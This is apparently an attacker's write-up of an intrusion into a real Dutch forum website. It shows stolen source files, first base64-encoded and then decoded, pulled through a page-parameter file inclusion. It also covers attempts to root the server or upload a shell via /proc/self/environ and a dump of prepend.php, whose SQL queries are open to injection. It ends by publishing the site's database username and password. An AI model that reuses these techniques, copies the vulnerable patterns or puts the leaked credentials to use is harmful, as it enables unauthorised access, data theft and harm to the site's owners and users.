PD9waHAgCnJlcXVpcmUgInByZXBlbmQucGhwIjsgCiRsb2dpbj 0kX0dFVFsnbG9naW4nXTsKPz4KPCFET0NUWVBFIGh0bWwgUFVC TElDICItLy9XM0MvL0RURCBYSFRNTCAxLjAgVHJhbnNpdGlvbm FsLy9FTiIgImh0dHA6Ly93d3cudzMub3JnL1RSL3hodG1sMS9E VEQveGh0bWwxLXRyYW5zaXRpb25hbC5kdGQiPgo8aHRtbCB4bW xucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+Cjxo ZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIG NvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIgLz4K PG1ldGEgIG5hbWUgPSAidmlld3BvcnQiIGNvbnRlbnQgPSAid2 lkdGg9MTAyNCIgLz4KPGxpbmsgaHJlZj0ic3RpamwuY3NzIiBy ZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiAvPgo8IS 0tW2lmIElFIDZdPiA8bGluayBocmVmPSJzdGlqbDEuY3NzIiBy ZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIj48IVtlbm RpZl0tLT4KPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVm PSIvZmF2aWNvbi5pY28iIC8+Cjx0aXRsZT5taXN0ZmxhcmQ8L3 RpdGxlPgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIg c3JjPSJtZDUuanMiPjwvc2NyaXB0Pgo8c2NyaXB0IGxhbmd1YW dlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gcGFzc1Jlc3BvbnNl KCkgewp2YXIgdXNlcl9lbGVtZW50ID0gZG9jdW1lbnQubG9naW 4udXNlcl90ZW1wLnZhbHVlOyAvLyBkb2N1bWVudC5oZm9ybS51 c2VyLnZhbHVlIAogIC8vZG9jdW1lbnQuaGZvcm0ucGFzcy52YW x1ZQpwYXNzPXVzZXJfZWxlbWVudCtkb2N1bWVudC5sb2dpbi5w YXNzX3RlbXAudmFsdWU7CmRvY3VtZW50LmxvZ2luLnBhc3NfdG VtcC52YWx1ZSA9ICIiOwp3YWNodDE9TUQ1KHBhc3MpLnRvTG93 ZXJDYXNlKCk7CnBhc3M9IiI7Cjw/cGhwICRwYXJhPW1pY3JvdGltZSgxKSoxMDAwOyA/PgpidWZmPXdhY2h0MSs8P3BocCBlY2hvICRwYXJhOyA/PjsgCndhY2h0Mj1NRDUoYnVmZikudG9Mb3dlckNhc2UoKTsKZG 9jdW1lbnQuaGZvcm0udXNlci52YWx1ZT11c2VyX2VsZW1lbnQ7 CmRvY3VtZW50Lmhmb3JtLnBhc3N3b3JkLnZhbHVlPXdhY2h0Mj sKZG9jdW1lbnQuaGZvcm0uY29kZS52YWx1ZT08P3BocCBlY2hv ICRwYXJhOyA/PjsKZG9jdW1lbnQuaGZvcm0uc3VibWl0KCk7Cn0KPC9zY3JpcH Q+CjwvaGVhZD4KPGJvZHk+CjxkaXYgaWQ9Ik1haW4iPgo8ZGl2 IGlkPSJIb29mZCI+CjxkaXYgaWQ9ImxvZ2luIj4KPD9waHAKaW YgKCRfU0VTU0lPTlsndXNlciddPT1udWxsKQp7CmlmICgkbG9n aW49PTEpIGVjaG8gIjxhIGhyZWY9J2luZGV4LnBocD9wYWdlPW hvbWUucGhwJmxvZ2luPTAnIHRpdGxlPSdnYSB0ZXJ1Zyc+PGlt ZyBzcmM9J2ltYWdlcy9rbm9weS5naWYnIGFsdD0ndWl0JyBzdH lsZT0nYm9yZGVyOjAnLz48L2E+IjsgZWxzZSBlY2hvICI8YSBo cmVmPSdpbmRleC5waHA/cGFnZT1pbmxlaWRpbmdhZG1pbi5waHAmbG9naW49MScgPjxpbW cgc3JjPSdpbWFnZXMva25vcHguZ2lmJyBhbHQ9J2Fhbicgc3R5 bGU9J2JvcmRlcjowJy8+PC9hPiI7CmlmICgkbG9naW4hPTEpCn sKaW5jbHVkZSAiY29udHJvbGUucGhwIjsKZWNobyAiPHRhYmxl Pjx0cj4iOwplY2hvICI8dGQ+Z2VicnVpa2Vyc25hYW06PC90ZD 48dGQ+d2FjaHR3b29yZDo8L3RkPjwvdHI+IjsKZWNobyAiPHRy Pjxmb3JtIGFjdGlvbj0nbG9naW4ucGhwJyBtZXRob2Q9J3Bvc3 QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0ndGV4dCcgbmFt ZT0ndXNlcm5hbWUnIHZhbHVlPScnIHN0eWxlPSd3aWR0aDo4N3 B4O2hlaWdodDoxMnB4O2ZvbnQtc2l6ZToxMXB4Jy8+PC90ZD4i OwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J3Bhc3N3b3JkJyBuYW 1lPSdwYXNzd29yZCcgdmFsdWU9Jycgc3R5bGU9J3dpZHRoOjg3 cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXplOjExcHgnIC8+PC90ZD 4iOwplY2hvICI8dGQ+PGlucHV0IHR5cGU9J2hpZGRlbicgbmFt ZT0nY29kZScgdmFsdWU9JHBhcmEgPjwvdGQ+IjsKZWNobyAiPH RkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J3N1Ym1pdEJ1 dHRvbicgdmFsdWU9J2xvZ2luJyBjbGFzcz0na25vcDEnLz48L3 RkPiI7CmVjaG8gIjwvZm9ybT4gIjsKfSBlbHNlCnsKZWNobyAn PGZvcm0gbmFtZT0ibG9naW4iPic7CmVjaG8gJzx0YWJsZT48dH I+PHRkPmdlYnJ1aWtlcnNuYWFtOjwvdGQ+PHRkPndhY2h0d29v cmQ6PC90ZD48L3RyPic7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT 0ndGV4dCcgbmFtZT0ndXNlcl90ZW1wJyB2YWx1ZT0nJyBzdHls ZT0nd2lkdGg6ODdweDtoZWlnaHQ6MTJweDtmb250LXNpemU6MT FweCcgLz48L3RkPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0n cGFzc3dvcmQnIG5hbWU9J3Bhc3NfdGVtcCcgdmFsdWU9Jycgc3 R5bGU9J3dpZHRoOjg3cHg7aGVpZ2h0OjEycHg7Zm9udC1zaXpl OjExcHgnIC8+PC90ZD4iOwplY2hvICc8dGQ+PGlucHV0IG9uQ2 xpY2s9InBhc3NSZXNwb25zZSgpOyByZXR1cm4gZmFsc2U7IiB0 eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdGJ0biIgdmFsdWU9Ik xvZ2luIHZlaWxpZyIgIGNsYXNzPSJrbm9wMiI+PC90ZD4nOwpl Y2hvICc8L2Zvcm0+JzsKZWNobyAnPGZvcm0gYWN0aW9uPSJsb2 dpbnZlaWxpZy5waHAiIE1FVEhPRD0iUE9TVCIgbmFtZT0iaGZv cm0iPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbW U9InVzZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJoaWRkZW4i IG5hbWU9InBhc3N3b3JkIj4nOwplY2hvICc8aW5wdXQgdHlwZT 0iaGlkZGVuIiBuYW1lPSJjb2RlIj4nOwplY2hvICc8L2Zvcm0+ JzsKfQp9IGVsc2UKewplY2hvICI8aW1nIHNyYz0naW1hZ2VzL2 tub3B6LmdpZicgYWx0PScnIHN0eWxlPSdib3JkZXI6MCcvPjwv YT4iOwokdXNlcj0kX1NFU1NJT05bJ3VzZXInXTsKZWNobyAiPH RhYmxlPjx0cj48dGQgc3R5bGU9J3dpZHRoOjIyMHB4Jz4kdXNl ciBpcyBpbmdlbG9nZC48L3RkPjwvdHI+IjsKZWNobyAiPHRyPj x0ZD48Zm9ybSBhY3Rpb249J2xvZ3VpdC5waHAnIG1ldGhvZD0n cG9zdCc+PGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3ViMm EnIHZhbHVlPSdsb2d1aXQnIGNsYXNzPSdrbm9wMScgdGl0bGU9 J3VpdGxvZ2dlbicvPiI7CmVjaG8gIjwvZm9ybT48L3RkPiI7IC AgLy8oPGEgaHJlZj0ibG9ndWl0LnBocCI+TG9ndWl0PC9hPikK IAp9CmlmICgoJF9TRVNTSU9OWyd1c2VyJ109PW51bGwpICYmIC gkbG9naW4hPTEpKQp7CmVjaG8gIjxmb3JtIGFjdGlvbj0naW5k ZXgucGhwP3BhZ2U9cGhwL2ZvcnVtL21lbGRhYW4ucGhwJyBtZX Rob2Q9J3Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0n c3VibWl0JyBuYW1lPSdzdWJtaXRCdXR0b24nIHZhbHVlPSdpbn NjaHJpanZlbicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPC90 ZD48L2Zvcm0+IjsKZWNobyAiPGZvcm0gYWN0aW9uPSdpbmRleC 5waHA/cGFnZT1waHAvZm9ydW0vdmVyZ2V0ZW4ucGhwJyBtZXRob2Q9J3 Bvc3QnPiI7CmVjaG8gIjx0ZD48aW5wdXQgdHlwZT0nc3VibWl0 JyBuYW1lPSdzdWIyJyB2YWx1ZT0nPycgY2xhc3M9J2tub3AwJy B0aXRsZT0nd2FjaHR3b29yZCB2ZXJnZXRlbj8nLz4iOwplY2hv ICI8L3RkPjwvZm9ybT4iOwp9IGVsc2UgaWYgKCRsb2dpbiE9MS kKewplY2hvICI8Zm9ybSBhY3Rpb249J2luZGV4LnBocD9wYWdl PXBocC9mb3J1bS9zY2hyaWpmdWl0LnBocCcgbWV0aG9kPSdwb3 N0Jz4iOyBlY2hvIjx0ZCBzdHlsZT0nd2lkdGg6MTI4cHgnPjwv dGQ+IjsKZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdzdWJtaXQnIG 5hbWU9J3N1Ym1pdEJ1dHRvbicgdmFsdWU9J3VpdHNjaHJpanZl bicgY2xhc3M9J2tub3AyJy8+IjsKZWNobyAiPGlucHV0IHR5cG U9J2hpZGRlbicgbmFtZT0ndXNlcm5hYW0nIHZhbHVlPVwiJHVz ZXJcIj4iOwplY2hvICI8L3RkPjwvZm9ybT4iOwogaWYgKCR1c2 VyPT0nYWRtaW4nKQogewogZWNobyAiPGZvcm0gYWN0aW9uPSdp bmRleC5waHA/cGFnZT1waHAvZm9ydW0vaW5zdGVsbGluZ2VuLnBocCcgbWV0aG 9kPSdwb3N0Jz4iOwogZWNobyAiPHRkPjxpbnB1dCB0eXBlPSdz dWJtaXQnIG5hbWU9J3N1YnN0ZWxpbicgdmFsdWU9J0luLicgY2 xhc3M9J2tub3AwJyB0aXRsZT0nSW5zdGVsbGluZ2VuJy8+IjsK IGVjaG8gIjwvdGQ+PC9mb3JtPiI7CiB9CiAKfSBlY2hvICI8L3 RyPjwvdGFibGU+PC9kaXY+IjsgLy8gZWluZGUgbG9naW4KJHZv cm0xPScnOyR2b3JtMj0nJzskdm9ybTM9Jyc7JHZvcm00PScnOy R2b3JtNT0nJzskdm9ybTY9Jyc7CmlmIChpc3NldCgkX0dFVFsn cGFnZSddKSkKICAgICRwYWdlID0gJF9HRVRbJ3BhZ2UnXTsKZW xzZSAkcGFnZSA9ICJpbmxlaWRpbmcucGhwIjsgCmlmICgkcGFn ZT09ImlubGVpZGluZy5waHAiKSAgIHskdm9ybTE9J2Jsb2snO3 0gZWxzZQppZiAoJHBhZ2U9PSJpbmxlaWRpbmdhZG1pbi5waHAi KXskdm9ybTE9J2Jsb2snO30gZWxzZQppZiAoJHBhZ2U9PSJob2 1lLnBocCIpICAgICAgICB7JHZvcm0yPSdibG9rJzt9IGVsc2UK aWYgKCRwYWdlPT0idG9lbGljaHRpbmcucGhwIikgeyR2b3JtMz 0nYmxvayc7fSBlbHNlCmlmICgkcGFnZT09ImZvcnVtcmVnZWxz LnBocCIpIHskdm9ybTQ9J2Jsb2snO30gZWxzZQppZiAoKCRwYW dlPT0iY29udGFjdC5waHAiKSB8fCAoJHBhZ2U9PSJlZm9ybS5w aHAiKSB8fCAoJHBhZ2U9PSJtYWlsLnBocCIpICkgeyR2b3JtNT 0nYmxvayc7fSBlbHNlIHskdm9ybTI9J2Jsb2snOyB9Cj8+Cjwv ZGl2PiA8IS0tZWluZGUgSG9vZmQtLT4KPGRpdiBjbGFzcz0ibW VudSI+CiA8ZGl2IGNsYXNzPSJob3Zlcm1lbnUiPgogPHVsPgog PGxpIGlkPSI8P3BocCBlY2hvICR2b3JtMTsgPz4iPjxhIGhyZW Y9ImluZGV4LnBocD9wYWdlPWlubGVpZGluZy5waHAiIHRpdGxl PSJJbmxlaWRpbmciPjxzcGFuPklubGVpZGluZzwvc3Bhbj48L2 E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNobyAkdm9ybTI7ID8+ Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCIgdGl0bGU9IkZvcnVtIj48c3Bhbj5Gb3 J1bTwvc3Bhbj48L2E+PC9saT4KIDxsaSBpZD0iPD9waHAgZWNo byAkdm9ybTM7ID8+Ij48YSBocmVmPSJpbmRleC5waHA/cGFnZT10b2VsaWNodGluZy5waHAiIHRpdGxlPSIiPjxzcGFuPl RvZWxpY2h0aW5nPC9zcGFuPjwvYT48L2xpPgogPGxpIGlkPSI8 P3BocCBlY2hvICR2b3JtNDsgPz4iPjxhIGhyZWY9ImluZGV4Ln BocD9wYWdlPWZvcnVtcmVnZWxzLnBocCIgdGl0bGU9IiI+PHNw YW4+Rm9ydW0gcmVnZWxzPC9zcGFuPjwvYT48L2xpPgogPGxpIG lkPSI8P3BocCBlY2hvICR2b3JtNTsgPz4iPjxhIGhyZWY9Imlu ZGV4LnBocD9wYWdlPWNvbnRhY3QucGhwIiB0aXRsZT0iIj48c3 Bhbj5Db250YWN0PC9zcGFuPjwvYT48L2xpPgogPC91bD4KPC9k aXY+CjwvZGl2Pgo8ZGl2IGNsYXNzPSJiYWxrIj48IS0tIHZvb3 IgSUUgNiAtLT48L2Rpdj4KPD9waHAKaWYgKGlzc2V0KCRfR0VU WydwYWdlJ10pKQogICAgJHBhZ2UgPSAkX0dFVFsncGFnZSddOw plbHNlICRwYWdlID0gImlubGVpZGluZy5waHAiOyAKPz4KPD9w aHAKZWNobyI8ZGl2IGlkPSdDb250ZW50Jz4iOwppZiAoKCRwYW dlPT0iaW5sZWlkaW5nYWRtaW4ucGhwIikgJiYgKCRfU0VTU0lP TlsndXNlciddIT1udWxsKSkgJHBhZ2U9ImlubGVpZGluZy5waH AiOwppbmNsdWRlICRwYWdlOyAKZWNobyAiPC9kaXY+IjsgLypl aW5kZSBjb250ZW50ICovCj8+CjxkaXYgaWQ9IlZvZXQiPgo8P3 BocApzZXRsb2NhbGUoTENfVElNRSwnbmxfTkwnLCdubCcsJ2R1 Jyk7CmVjaG8gIjxkaXYgc3R5bGU9J21hcmdpbi1sZWZ0OjYwMH B4O21hcmdpbi10b3A6MTBweDsnPiIuJ1BhZ2luYSBnZW9wZW5k OiAnLCBzdHJmdGltZSgiJUg6JU06JVMgJUEgJWQgJUIgJVkiLC Bta3RpbWUoKSksJzwvZGl2Pic7Cj8+CjwvZGl2Pgo8L2Rpdj4g PCEtLWVpbmRlIG1haW4tLT4KCjxzY3JpcHQgdHlwZT0idGV4dC 9qYXZhc2NyaXB0Ij4KdmFyIGdhSnNIb3N0ID0gKCgiaHR0cHM6 IiA9PSBkb2N1bWVudC5sb2NhdGlvbi5wcm90b2NvbCkgPyAiaH R0cHM6Ly9zc2wuIiA6ICJodHRwOi8vd3d3LiIpOwpkb2N1bWVu dC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIG dhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpz JyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdC UzRSIpKTsKPC9zY3JpcHQ+CjxzY3JpcHQgdHlwZT0idGV4dC9q YXZhc2NyaXB0Ij4KdHJ5ewp2YXIgcGFnZVRyYWNrZXIgPSBfZ2 F0Ll9nZXRUcmFja2VyKCJVQS0xNzUwODA1Ny0xIik7CnBhZ2VU cmFja2VyLl90cmFja1BhZ2V2aWV3KCk7Cn0gY2F0Y2goZXJyKS B7fQo8L3NjcmlwdD4KCjwvYm9keT4KPC9odG1s
-------------------------------------
Decoded Response
------------------------------------
<?php
require "prepend.php";
$login=$_GET['login'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name = "viewport" content = "width=1024" />
<link href="stijl.css" rel="stylesheet" type="text/css" />
<!--[if IE 6]> <link href="stijl1.css" rel="stylesheet" type="text/css"><![endif]-->
<link rel="shortcut icon" href="/favicon.ico" />
<title>mistflard</title>
<script type="text/javascript" src="md5.js"></script>
<script language="javascript">
function passResponse() {
var user_element = document.login.user_temp.value; // document.hform.user.value
//document.hform.pass.value
pass=user_element+document.login.pass_temp.value;
document.login.pass_temp.value = "";
wacht1=MD5(pass).toLowerCase();
pass="";
<?php $para=microtime(1)*1000; ?>
buff=wacht1+<?php echo $para; ?>;
wacht2=MD5(buff).toLowerCase();
document.hform.user.value=user_element;
document.hform.password.value=wacht2;
document.hform.code.value=<?php echo $para; ?>;
document.hform.submit();
}
</script>
</head>
<body>
<div id="Main">
<div id="Hoofd">
<div id="login">
<?php
if ($_SESSION['user']==null)
{
if ($login==1) echo "<a href='index.php?page=home.php&login=0' title='ga terug'><img src='images/knopy.gif' alt='uit' style='border:0'/></a>"; else echo "<a href='index.php?page=inleidingadmin.php&login=1' ><img src='images/knopx.gif' alt='aan' style='border:0'/></a>";
if ($login!=1)
{
include "controle.php";
echo "<table><tr>";
echo "<td>gebruikersnaam:</td><td>wachtwoord:</td></tr>";
echo "<tr><form action='login.php' method='post'>";
echo "<td><input type='text' name='username' value='' style='width:87px;height:12px;font-size:11px'/></td>";
echo "<td><input type='password' name='password' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo "<td><input type='hidden' name='code' value=$para ></td>";
echo "<td><input type='submit' name='submitButton' value='login' class='knop1'/></td>";
echo "</form> ";
} else
{
echo '<form name="login">';
echo '<table><tr><td>gebruikersnaam:</td><td>wachtwoord:</td></tr>';
echo "<td><input type='text' name='user_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo "<td><input type='password' name='pass_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
echo '<td><input onClick="passResponse(); return false;" type="submit" name="submitbtn" value="Login veilig" class="knop2"></td>';
echo '</form>';
echo '<form action="loginveilig.php" METHOD="POST" name="hform">';
echo '<input type="hidden" name="user">';
echo '<input type="hidden" name="password">';
echo '<input type="hidden" name="code">';
echo '</form>';
}
} else
{
echo "<img src='images/knopz.gif' alt='' style='border:0'/></a>";
$user=$_SESSION['user'];
echo "<table><tr><td style='width:220px'>$user is ingelogd.</td></tr>";
echo "<tr><td><form action='loguit.php' method='post'><input type='submit' name='sub2a' value='loguit' class='knop1' title='uitloggen'/>";
echo "</form></td>"; //(<a href="loguit.php">Loguit</a>)
}
if (($_SESSION['user']==null) && ($login!=1))
{
echo "<form action='index.php?page=php/forum/meldaan.php' method='post'>";
echo "<td><input type='submit' name='submitButton' value='inschrijven' class='knop2'/>";
echo "</td></form>";
echo "<form action='index.php?page=php/forum/vergeten.php' method='post'>";
echo "<td><input type='submit' name='sub2' value='?' class='knop0' title='wachtwoord vergeten?'/>";
echo "</td></form>";
} else if ($login!=1)
{
echo "<form action='index.php?page=php/forum/schrijfuit.php' method='post'>"; echo"<td style='width:128px'></td>";
echo "<td><input type='submit' name='submitButton' value='uitschrijven' class='knop2'/>";
echo "<input type='hidden' name='usernaam' value=\"$user\">";
echo "</td></form>";
if ($user=='admin')
{
echo "<form action='index.php?page=php/forum/instellingen.php' method='post'>";
echo "<td><input type='submit' name='substelin' value='In.' class='knop0' title='Instellingen'/>";
echo "</td></form>";
}
} echo "</tr></table></div>"; // einde login
$vorm1='';$vorm2='';$vorm3='';$vorm4='';$vorm5=''; $vorm6='';
if (isset($_GET['page']))
$page = $_GET['page'];
else $page = "inleiding.php";
if ($page=="inleiding.php") {$vorm1='blok';} else
if ($page=="inleidingadmin.php"){$vorm1='blok';} else
if ($page=="home.php") {$vorm2='blok';} else
if ($page=="toelichting.php") {$vorm3='blok';} else
if ($page=="forumregels.php") {$vorm4='blok';} else
if (($page=="contact.php") || ($page=="eform.php") || ($page=="mail.php") ) {$vorm5='blok';} else {$vorm2='blok'; }
?>
</div> <!--einde Hoofd-->
<div class="menu">
<div class="hovermenu">
<ul>
<li id="<?php echo $vorm1; ?>"><a href="index.php?page=inleiding.php" title="Inleiding"><span>Inleiding</span></a></li>
<li id="<?php echo $vorm2; ?>"><a href="index.php?page=home.php" title="Forum"><span>Forum</span></a></li>
<li id="<?php echo $vorm3; ?>"><a href="index.php?page=toelichting.php" title=""><span>Toelichting</span></a></li>
<li id="<?php echo $vorm4; ?>"><a href="index.php?page=forumregels.php" title=""><span>Forum regels</span></a></li>
<li id="<?php echo $vorm5; ?>"><a href="index.php?page=contact.php" title=""><span>Contact</span></a></li>
</ul>
</div>
</div>
<div class="balk"><!-- voor IE 6 --></div>
<?php
if (isset($_GET['page']))
$page = $_GET['page'];
else $page = "inleiding.php";
?>
<?php
echo"<div id='Content'>";
if (($page=="inleidingadmin.php") && ($_SESSION['user']!=null)) $page="inleiding.php";
include $page;
echo "</div>"; /*einde content */
?>
<div id="Voet">
<?php
setlocale(LC_TIME,'nl_NL','nl','du');
echo "<div style='margin-left:600px;margin-top:10px;'>".'Pagina geopend: ', strftime("%H:%M:%S %A %d %B %Y", mktime()),'</div>';
?>
</div>
</div> <!--einde main-->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try{
var pageTracker = _gat._getTracker("UA-17508057-1");
pageTracker._trackPageview();
} catch(err) {}
</script>
</body>
</html
-------------------------------------------------------------------
4.)Now we move on to see if we can root the box or atleast get a shell uploaded now they have open base dir restriction in effect
so i highly doubt we can upload a shell via proc/self/environ but we can try hold. nah didnt thnk so lets try this
5.)i grab prepend.php and decode its contents as well using opionated geeks base 64 decoder online and get the following
-----------------------------------------------
prepend.php
-----------------------------------------------
<?php
session_start();
require_once "MyDB.class.php";
require_once "php/login/versio.inc.php";
function check_ip($ip)
{
$mydb= new MyDB();
$sql="SELECT * FROM blokkeer Where ip='$ip'";
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) == 0) return true; else
{
$vandaag=date("Y-m-d");
$line = $mydb->fetch($result);
$datum=$line[2];
$reden=$line[4];
setlocale(LC_TIME,'nl_NL','nl','du');
$refa1=strpos($datum,'-');
$refa2=strripos($datum,'-');
$jaarA=substr($datum,0,$refa1);
$dagA=substr($datum,($refa2+1),2);
$maandA=substr($datum,($refa1+1),2);
$dat=strftime("%A %d %B %Y", mktime(0, 0, 0, $maandA, $dagA, $jaarA));
if ($datum>$vandaag) {echo "De toegang tot deze functie is u ontzegd, IP-adres geblokkeerd tot ".$dat;
if (($reden!='') && ($reden!=null)) echo "<br>wegens: ".$reden;
echo '<br><br>Keer terug naar de begin pagina.';
echo '<table><tr></tr><tr>';
echo '<form action="index.php?page=home.php" method="post">';
echo '<td><input type="submit" value="OK" class="verstuur"></td>';
echo '</form></tr></table>';
return false;}
else return true;
}
}
function check_mail($user)
{
$mydb= new MyDB();
$sql="SELECT veri FROM WebUser Where username='$user'";
$result=$mydb->doQuery($sql);
$line = $mydb->fetch($result);
if ($line[0] == 1) return true; else return false;
}
function check_auth_user3($user,$authorization) // nieuwe functie met extra controles
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($_SESSION['session_id']); $sw=false; // sessieid voldoet niet
if (($sessionid==$_SESSION['session_id']) && ($len==50) ) $sw=true; else {echo "Geen toegang: Sessionid klopt niet.<br>".$_SESSION['session_id']."<br>".$sessionid."<br>". $_SESSION['error_message']."<br>"; return false;}
if (($sw) && ($ip==$ipref)) $sx=true; else {echo "Geen toegang: Inlog-IP-adres verschilt van huidig IP-adres.<br>"; return false;} // username voldoet niet
}
else {echo "Geen toegang: Log eerst in a.u.b.<br>"; return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {echo "U bent niet geautoriseerd om deze pagina te openen.<br>"; return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
function check_auth_user4($user,$authorization) // nieuwe functie met extra controles zelfde functie als 3 maar dan zonder tekstmelding
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($_SESSION['session_id']); $sw=false;
if (($sessionid==$_SESSION['session_id']) && ($len==50) ) $sw=true; else {return false;} // sessieid voldoet niet
if (($sw) && ($ip==$ipref)) $sx=true; else {return false;} // ip voldoet niet
}
else {return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
function check_auth_user5($user,$session,$authorization) //functie voor aparte controle om na verloop sessie toch nog geldige submit te kunnen doen.
{
$sx=false;
$mydb= new MyDB();
$sql = "Select sessionid,ip from WebUser where username='$user'";
//echo $sql;
$result=$mydb->doQuery($sql);
if (mysql_num_rows($result) >0)
{
$line = $mydb->fetch($result);
$sessionid=$line[0];
$ip=$line[1];
$ipref=$_SERVER['REMOTE_ADDR'];
$len=strlen($session); $sw=false;
if ( ($sessionid==$session) && ($len==50) ) {$sw=true; echo "Check_auth_user5 succesvol uitgevoerd<br>";} else {return false;} // sessieid voldoet niet
if (($sw) && ($ip==$ipref)) $sx=true; else {return false;} // ip voldoet niet
}
else {return false;} // username voldoet niet
if (($user) && ($sx))
{
$query = "select * from UserAuthorization where username = '"."$user"."' and
authorization='"."$authorization"."' ";
$result=$mydb->doQuery($query);
if (mysql_num_rows($result) >0) return true; else {return false; }// autorisatie voldoet niet
}
else return false; // geen usename
}
?
-----------------------------------------------
6.)fuck that wasnt eas but here guys these assholes are smart sort of
====================
login info
====================
<?php
define(HOST, "localhost");
define(USERNAME,"jthkrgfw_beheer");
define(PASSWORD,"w15129");
define(DATABASE,"jthkrgfw_mistflard");
?>